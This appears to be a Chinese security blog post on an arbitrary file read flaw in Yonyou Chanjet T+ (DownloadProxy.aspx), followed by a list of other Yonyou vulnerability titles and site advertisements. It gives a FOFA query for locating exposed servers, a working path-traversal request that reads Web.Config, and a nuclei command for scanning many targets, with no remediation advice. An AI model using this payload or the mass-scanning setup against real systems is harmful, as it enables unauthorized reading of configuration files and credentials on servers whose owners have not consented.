用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞
用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞
漏洞描述
用友 畅捷通T+ DownloadProxy.aspx文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感文件
漏洞影响
用友 畅捷通T+
FOFA
app="畅捷通-TPlus"
漏洞复现
登录页面
验证POC
/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config
nuclei-pocs
nuclei -t nuclei -t yonyou_changjietong_readfile_DownloadProxy.yaml -l url.txt
nuclei-poc 关注北极星sec公众号回复0921获取
用友漏洞待更新记录
-
用友 U8 OA test.jsp SQL注入漏洞
-
用友nc v6.5 远程命令执行漏洞 (CNVD-2021-30167)
-
用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞
-
用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞
-
用友 NCCloud FS文件管理SQL注入
-
用友 NC NCFindWeb 任意文件读取漏洞
-
用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
-
用友 GRP-U8 Proxy SQL注入 CNNVD-201610-923
-
用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞
-
用友 ERP-NC NCFindWeb 目录遍历漏洞
-
用友nc v6.5 反序列化漏洞 补丁绕过
-
用友nc v6.5 反序列化漏洞
-
用友nc v6.5 反射型xss
-
用友nc v6.5 前台任意文件上传漏洞
-
(CNVD-2021-37786)用友nc Cloud FS 文件管理系统 任意账户登录漏洞
-
用友 GRP-u8 前台存在任意文件上传漏洞
-
用友nc IUFO v5.3 反射型xss
-
用友nc 控制台绕过漏洞
-
用友nc 数据库密码解密
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 微软正式发布.NET 10 Preview 1:开启下一代开发框架新篇章
· 没有源码,如何修改代码逻辑?
· NetPad:一个.NET开源、跨平台的C#编辑器
· PowerShell开发游戏 · 打蜜蜂
· 凌晨三点救火实录:Java内存泄漏的七个神坑,你至少踩过三个!